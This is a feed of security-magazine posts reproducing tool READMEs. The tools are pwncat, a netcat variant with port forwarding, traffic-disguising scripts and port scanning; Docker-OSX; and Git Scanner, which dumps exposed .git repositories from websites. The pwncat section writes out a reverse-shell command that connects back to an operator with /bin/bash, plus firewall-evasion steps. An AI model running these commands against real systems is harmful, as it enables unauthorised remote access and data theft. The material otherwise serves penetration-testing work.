INFO: [bind-sock] Sock: SO_MARK: 0
INFO: [bind-sock] IPv4: IP_OPTIONS: 0
INFO: [bind-sock] IPv4: IP_HDRINCL: 0
INFO: [bind-sock] IPv4: IP_TOS: 0
INFO: [bind-sock] IPv4: IP_TTL: 64
INFO: [bind-sock] IPv4: IP_RECVOPTS: 0
INFO: [bind-sock] IPv4: IP_RECVRETOPTS: 0
INFO: [bind-sock] IPv4: IP_RETOPTS: 0
INFO: [bind-sock] IPv4: IP_MULTICAST_IF: 0
INFO: [bind-sock] IPv4: IP_MULTICAST_TTL: 1
INFO: [bind-sock] IPv4: IP_MULTICAST_LOOP: 1
INFO: [bind-sock] IPv4: IP_DEFAULT_MULTICAST_TTL: 0
INFO: [bind-sock] IPv4: IP_DEFAULT_MULTICAST_LOOP: 0
INFO: [bind-sock] IPv4: IP_MAX_MEMBERSHIPS: 0
INFO: [bind-sock] IPv4: IP_TRANSPARENT: 0
INFO: [bind-sock] TCP: TCP_NODELAY: 0
INFO: [bind-sock] TCP: TCP_MAXSEG: 536
INFO: [bind-sock] TCP: TCP_CORK: 0
INFO: [bind-sock] TCP: TCP_KEEPIDLE: 7200
INFO: [bind-sock] TCP: TCP_KEEPINTVL: 75
INFO: [bind-sock] TCP: TCP_KEEPCNT: 9
INFO: [bind-sock] TCP: TCP_SYNCNT: 6
INFO: [bind-sock] TCP: TCP_LINGER2: 60
INFO: [bind-sock] TCP: TCP_DEFER_ACCEPT: 0
INFO: [bind-sock] TCP: TCP_WINDOW_CLAMP: 0
INFO: [bind-sock] TCP: TCP_INFO: 10
INFO: [bind-sock] TCP: TCP_QUICKACK: 1
INFO: [bind-sock] TCP: TCP_FASTOPEN: 0

Port forwarding magic

Local TCP port forwarding

Scenario

  1. Alice can be reached from the Outside (TCP/UDP)
  2. Bob can only be reached from Alice's machine
                              |                               |
        Outside               |           DMZ                 |        private subnet
                              |                               |
                              |                               |
     +-----------------+     TCP     +-----------------+     TCP     +-----------------+
     | The cat         | -----|----> | Alice           | -----|----> | Bob             |
     |                 |      |      | pwncat          |      |      | MySQL           |
     | 56.0.0.1        |      |      | 72.0.0.1:3306   |      |      | 10.0.0.1:3306   |
     +-----------------+      |      +-----------------+      |      +-----------------+
     pwncat 72.0.0.1 3306     |      pwncat \                 |
                              |        -L 72.0.0.1:3306 \     |
                              |         10.0.0.1 3306         |

Local UDP port forwarding

Scenario

  1. Alice can be reached from the Outside (but only via UDP)
  2. Bob can only be reached from Alice's machine
                              |                               |
        Outside               |           DMZ                 |        private subnet
                              |                               |
                              |                               |
     +-----------------+     UDP     +-----------------+     TCP     +-----------------+
     | The cat         | -----|----> | Alice           | -----|----> | Bob             |
     |                 |      |      | pwncat -L       |      |      | MySQL           |
     | 56.0.0.1        |      |      | 72.0.0.1:3306   |      |      | 10.0.0.1:3306   |
     +-----------------+      |      +-----------------+      |      +-----------------+
     pwncat -u 72.0.0.1 3306  |      pwncat -u \              |
                              |        -L 72.0.0.1:3306 \     |
                              |        10.0.0.1 3306          |

Remote TCP port forward

Scenario

  1. Alice cannot be reached from the Outside
  2. Alice is allowed to connect to the Outside (TCP/UDP)
  3. Bob can only be reached from Alice's machine
                              |                               |
        Outside               |           DMZ                 |        private subnet
                              |                               |
                              |                               |
     +-----------------+     TCP     +-----------------+     TCP     +-----------------+
     | The cat         | <----|----- | Alice           | -----|----> | Bob             |
     |                 |      |      | pwncat          |      |      | MySQL           |
     | 56.0.0.1        |      |      | 72.0.0.1:3306   |      |      | 10.0.0.1:3306   |
     +-----------------+      |      +-----------------+      |      +-----------------+
     pwncat -l 4444           |      pwncat --reconn \        |
                              |        -R 56.0.0.1:4444 \     |
                              |        10.0.0.1 3306          |

Remote UDP port forward

Scenario

  1. Alice cannot be reached from the Outside
  2. Alice is allowed to connect to the Outside (UDP: DNS only)
  3. Bob can only be reached from Alice's machine
                              |                               |
        Outside               |           DMZ                 |        private subnet
                              |                               |
                              |                               |
     +-----------------+     UDP     +-----------------+     TCP     +-----------------+
     | The cat         | <----|----- | Alice           | -----|----> | Bob             |
     |                 |      |      | pwncat          |      |      | MySQL           |
     | 56.0.0.1        |      |      | 72.0.0.1:3306   |      |      | 10.0.0.1:3306   |
     +-----------------+      |      +-----------------+      |      +-----------------+
     pwncat -u -l 53          |      pwncat -u --reconn \     |
                              |        -R 56.0.0.1:4444 \     |
                              |        10.0.0.1 3306          |

Outbound port hopping

If you have no idea what outbound ports are allowed from the target machine, you can instruct the client (e.g.: in case of a reverse shell) to probe outbound ports endlessly.

# Reverse shell on target (the client)
# --exec            # The command shell the client should provide
# --reconn          # Instruct it to reconnect endlessly
# --reconn-wait     # Reconnect every 0.1 seconds
# --reconn-robin    # Use these ports to probe for outbount connections

pwncat --exec /bin/bash --reconn --reconn-wait 0.1 --reconn-robin 54-1024 10 10.0.0.1 53

Once the client is up and running, either use raw sockets to check for inbound traffic or use something like Wireshark or tcpdump to find out from where the client is able to connect back to you,

If you found one or more ports that the client is able to connect to you, simply start your listener locally and wait for it to come back.

pwncat -l <ip> <port>

If the client connects to you, you will have a working reverse shell. If you stop your local listening server accidentally or on purpose, the client will probe ports again until it connects successfully. In order to kill the reverse shell client, you can use --safe-word (when starting the client).

If none of this succeeds, you can add other measures such as using UDP or even wrapping your packets into higher level protocols, such as HTTP or others. See PSE or examples below for how to transform your traffic.

Pwncat Scripting Engine (PSE)

pwncat offers a Python based scripting engine to inject your custom code before sending and after receiving data.

How it works

You will simply need to provide a Python file with the following entrypoint function:

def transform(data, pse):
    # Example to reverse a string
    return data[::-1]

Both, the function name must be named transform and the parsed arguments must be named data and pse. Other than that you can add as much code as you like. Each instance of pwncat can take two scripts:

  1. --script-send: script will be applied before sending
  2. --script-recv: script will be applied after receiving

See here for API and more details

Example 1: Self-built asymmetric encryption

PSE: asym-enc source code

This will encrypt your traffic asymmetrically. It is just a very basic ROT13 implementation with different shift lengths on both sides to emulate asymmetry. You could do the same and implement GPG based asymmetric encryption for PSE.

# server
pwncat -vvvv -l localhost 4444 \
  --script-send pse/asym-enc/pse-asym_enc-server_send.py \
  --script-recv pse/asym-enc/pse-asym_enc-server_recv.py
# client
pwncat -vvvv localhost 4444 \
  --script-send pse/asym-enc/pse-asym_enc-client_send.py \
  --script-recv pse/asym-enc/pse-asym_enc-client_recv.py

Example 2: Self-built HTTP POST wrapper

PSE: http-post source code

This will wrap all traffic into a valid HTTP POST request, making it look like normal HTTP traffic.

# server
pwncat -vvvv -l localhost 4444 \
  --script-send pse/http-post/pse-http_post-pack.py \
  --script-recv pse/http-post/pse-http_post-unpack.py
# client
pwncat -vvvv localhost 4444 \
  --script-send pse/http-post/pse-http_post-pack.py \
  --script-recv pse/http-post/pse-http_post-unpack.py

Port scanning

TCP

$ sudo netstat -tlpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address     State
tcp        0      0 127.0.0.1:631           0.0.0.0:*           LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*           LISTEN
tcp        0      0 127.0.0.1:4444          0.0.0.0:*           LISTEN
tcp        0      0 0.0.0.0:902             0.0.0.0:*           LISTEN
tcp6       0      0 ::1:631                 :::*                LISTEN
tcp6       0      0 ::1:25                  :::*                LISTEN
tcp6       0      0 ::1:4444                :::*                LISTEN
tcp6       0      0 :::1053                 :::*                LISTEN
tcp6       0      0 :::902                  :::*                LISTEN

UDP

The following UDP ports are exposing:

$ sudo netstat -ulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address
udp        0      0 0.0.0.0:631             0.0.0.0:*
udp        0      0 0.0.0.0:5353            0.0.0.0:*
udp        0      0 0.0.0.0:39856           0.0.0.0:*
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp6       0      0 :::1053                 :::*
udp6       0      0 :::5353                 :::*
udp6       0      0 :::57728                :::*

nmap

$ time sudo nmap -T5 localhost --version-intensity 0 -p- -sU
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-24 17:03 CEST
Warning: 127.0.0.1 giving up on port because retransmission cap hit (2).
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 65529 closed ports
PORT      STATE         SERVICE
68/udp    open|filtered dhcpc
631/udp   open|filtered ipp
1053/udp  open|filtered remote-as
5353/udp  open|filtered zeroconf
39856/udp open|filtered unknown
40488/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 179.15 seconds

real    2m52.446s
user    0m0.844s
sys     0m2.571s

netcat

$ time nc  -z localhost 1-65535  -u -4 -v
Connection to localhost 68 port [udp/bootpc] succeeded!
Connection to localhost 631 port [udp/ipp] succeeded!
Connection to localhost 1053 port [udp/*] succeeded!
Connection to localhost 5353 port [udp/mdns] succeeded!
Connection to localhost 39856 port [udp/*] succeeded!

real    0m18.734s
user    0m1.004s
sys     0m2.634s

pwncat

$ time pwncat -z localhost 1-65535 -u -4
Scanning 65535 ports
[+]    68/UDP open   (IPv4)
[+]   631/UDP open   (IPv4)
[+]  1053/UDP open   (IPv4)
[+]  5353/UDP open   (IPv4)
[+] 39856/UDP open   (IPv4)

real    0m7.309s
user    0m6.465s
sys     0m4.794s

ℹ FAQ

Q: Is pwncat compatible with netcat?

A: Yes, it is fully compatible in the way it behaves in connect, listen and zero-i/o mode. You can even mix pwncat with netcat, ncat or similar tools.

Q: Does it work on X?

A: In its current state it works with Python 2, 3 pypy2 and pypy3 and is fully tested on Linux and MacOS. Windows support is available, but is considered experimental (see integration tests).

Q: I found a bug / I have to suggest a new feature! What can I do?

A: For bug reports or enhancements, please open an issue here.

Q: How can I support this project?

A: Thanks for asking! First of all, star this project to give me some feedback and see CONTRIBUTING.md for details.

🔒 cytopia sec tools

Below is a list of sec tools and docs I am maintaining.

Name Category Language Description
offsec Documentation Markdown Offsec checklist, tools and examples
header-fuzz Enumeration Bash Fuzz HTTP headers
smtp-user-enum Enumeration Python 2+3 SMTP users enumerator
urlbuster Enumeration Python 2+3 Mutable web directory fuzzer
pwncat Pivoting Python 2+3 Cross-platform netcat on steroids
badchars Reverse Engineering Python 2+3 Badchar generator
fuzza Reverse Engineering Python 2+3 TCP fuzzing tool

:octocat: Contributing

See Contributing guidelines to help to improve this project.

❗ Disclaimer

This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.


More: https://github.com/cytopia/pwncat and http://pwncat.org

The post pwncat - netcat on steroids with Firewall, IDS/IPS evasion, and its fully scriptable with Python (PSE) appeared first on Hakin9 - IT Security Magazine.

Docker-OSX - Run Mac in a Docker container

$
0
0

Run Mac in a Docker container! Run near-native OSX-KVM in Docker! X11 Forwarding!

Author: Sick.Codes https://sick.codes/

Credits: OSX-KVM project among many others: https://github.com/kholia/OSX-KVM/blob/master/CREDITS.md

Docker Hub: https://hub.docker.com/r/sickcodes/docker-osx

Pull requests, suggestions very welcome!

docker pull sickcodes/docker-osx

docker run --privileged -v /tmp/.X11-unix:/tmp/.X11-unix sickcodes/docker-osx

# press ctrl G if your mouse gets stuck

# scroll down to troubleshooting if you have problems

Requirements: KVM on the host

Need to turn on hardware virtualization in your BIOS, very easy to do.

Then have QEMU on the host if you haven't already:

# ARCH
sudo pacman -S qemu libvirt dnsmasq virt-manager bridge-utils flex bison ebtables edk2-ovmf

# UBUNTU DEBIAN
sudo apt install qemu qemu-kvm libvirt-clients libvirt-daemon-system bridge-utils virt-manager

# CENTOS RHEL FEDORA
sudo yum install libvirt qemu-kvm -y

# then run
sudo systemctl enable libvirtd.service
sudo systemctl enable virtlogd.service
sudo modprobe kvm

# reboot

Start the same container later (persistent disk)

This is for when you want to run your system later.

If you don't run this you will have a new image every time.

# look at your recent containers
docker ps --all --filter "ancestor=docker-osx"
docker ps --all --filter "ancestor=sickcodes/docker-osx"

# boot the old ones
docker start $(docker ps -q --all --filter "ancestor=docker-osx")
docker start $(docker ps -q --all --filter "ancestor=sickcodes/docker-osx")

# close all the ones you don't need

# check which one is still running
docker ps

# write down the good one and then use that for later
docker start xxxxxxx

Additional Boot Instructions


# Boot the macOS Base System

# Click Disk Utility

# Erase the biggest disk

# Partition that disk and subtract 1GB and press Apply

# Click Reinstall macOS

Troubleshooting

Alternative run, thanks @roryrjb docker run --privileged --net host --cap-add=ALL -v /tmp/.X11-unix:/tmp/.X11-unix -v /dev:/dev -v /lib/modules:/lib/modules sickcodes/docker-osx

Check if your hardware virt is on egrep -c '(svm|vmx)' /proc/cpuinfo

Try adding yourself to the docker group sudo usermod -aG docker $USER

Turn on docker daemon sudo nohup dockerd &

Check /dev/kvm permissions sudo chmod 666 /dev/kvm

If you don't have Docker already

### Arch (pacman version isn't right at time of writing)

wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.5.tgz
tar -xzvf docker-*.tgz
sudo cp docker/* /usr/bin/
sudo dockerd &
sudo groupadd docker
sudo usermod -aG docker $USER
# run docker later
sudo nohup dockerd &

### Ubuntu

apt-get remove docker docker-engine docker.io containerd runc -y
apt-get install apt-transport-https ca-certificates curl gnupg-agent software-properties-common -y
curl -fsSL https://download.docker.com/linux/ubuntu/gpg |  apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update -y
apt-get install docker-ce docker-ce-cli containerd.io -y
sudo dockerd &
sudo groupadd docker
sudo usermod -aG docker $USER

Backup the disk

your image will be stored in:

/var/lib/docker/overlay2/...../arch/OSX-KVM/home/arch/OSX-KVM/mac_hdd_ng.img
# find your container's root folder

docker inspect $(docker ps -q --all --filter "ancestor=docker-osx") | grep UpperDir

# In the folder from the above command, your image is inside ./home/arch/OSX-KVM/mac_hdd_ng.img

# then sudo cp it somewhere. Don't do it while the container is running tho, it bugs out.

Wipe old images


# WARNING deletes all old images, but saves disk space if you make too many containers

docker system prune --all
docker image prune --all

Instant OSX-KVM in a BOX!

This Dockerfile automates the installation of OSX-KVM inside a docker container. It will build a 32GB Mojave Disk. You can change the size and version using build arguments (see below). This file builds on top of the work done by Dhiru Kholia and many others on the OSX-KVM project.

Custom Build


docker build -t docker-osx:latest \
--build-arg VERSION=10.14.6 \
--build-arg SIZE=200G

docker run --privileged -v /tmp/.X11-unix:/tmp/.X11-unix docker-osx:latest

Todo:

# persistent disk with least amount of pre-build errands.

More: https://github.com/sickcodes/Docker-OSX

The post Docker-OSX - Run Mac in a Docker container appeared first on Hakin9 - IT Security Magazine.

Git Scanner: A tool for targeting websites that have open .git repositories available in public

$
0
0

Git Scanner Framework is a tool can scan websites with open .git repositories for Bug Hunting/ Pentesting Purposes and can dump the content of the .git repositories from webservers that found from the scanning method. This tool works with the provided Single target or Mass Target from a file list.

Installation of Git Scanner

- git clone https://github.com/HightechSec/git-scanner
- cd git-scanner
- bash gitscanner.sh

or you can install in your system like this

- git clone https://github.com/HightechSec/git-scanner
- cd git-scanner
- sudo cp gitscanner.sh /usr/bin/gitscanner && sudo chmod +x /usr/bin/gitscanner
- $ gitscanner

Git Scanner Usage

  • Menu's
    • Menu 1 is for scanning and dumping git repositories from a provided file that contains the list of the target url or a provided single target url.
    • Menu 2 is for scanning only a git repositories from a provided file that contains the list of the target url or a provided single target url.
    • Menu 3 is for Dumping only the git repositories from a provided file that contains list of the target url or a provided single target url. This will work for the Maybe Vuln Results or sometimes with a repository that had directory listing disabled or maybe had a 403 Error Response.
    • Menu 4 is for Extracting files only from a Folder that had .git Repositories to a destination folder
  • URL Format
  • Extractor
    • When using Extractor, make sure the location of the git repositories that you select is correct. Remember, The first option is for inputting the Selected git repository and the second option is for inputting the Destination folder

Requirements

  • curl
  • bash
  • git
  • sed

Todos

  • Creating a Docker Images if it's possible
  • Adding Extractor on the next Version Added in version 1.0.2#beta but still experimental.
  • Adding Thread Processing Multi Processing (Bash doesn't Support Threading)

Changelog

All notable changes to this project listed in this file

Credits

Thanks to:

The post Git Scanner: A tool for targeting websites that have open .git repositories available in public appeared first on Hakin9 - IT Security Magazine.

Viewing all 612 articles
Browse latest View live